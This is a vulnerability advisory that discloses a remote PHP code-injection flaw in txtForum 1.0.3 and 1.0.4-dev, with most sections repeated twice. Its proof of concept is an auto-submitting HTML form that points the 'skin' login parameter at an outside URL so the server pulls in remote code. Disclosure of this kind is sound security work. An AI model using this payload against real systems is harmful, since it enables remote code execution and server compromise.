txtForum Remote PHP Script Code Injection Vulnerability
BID:17061
Info
txtForum Remote PHP Script Code Injection Vulnerability
| Bugtraq ID: | 17061 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 09 2006 12:00AM |
| Updated: | Mar 11 2006 06:40AM |
| Credit: | [email protected] is credited with the discovery of this issue. |
| Vulnerable: |
txtForum txtForum 1.0.4 -dev txtForum txtForum 1.0.3 -dev |
| Not Vulnerable: | |
Discussion
txtForum Remote PHP Script Code Injection Vulnerability
txtForum is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to facilitate a compromise of the application and the underlying system; other attacks are also possible.
txtForum is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to facilitate a compromise of the application and the underlying system; other attacks are also possible.
Exploit / POC
txtForum Remote PHP Script Code Injection Vulnerability
This issue can be exploited through use of a web client.
An example has been provided:
<form action='http://www.example.com/txtforum104/login.php' method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://www.example.com"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
This issue can be exploited through use of a web client.
An example has been provided:
<form action='http://www.example.com/txtforum104/login.php' method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://www.example.com"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
Solution / Fix
txtForum Remote PHP Script Code Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
References
txtForum Remote PHP Script Code Injection Vulnerability
References:
References: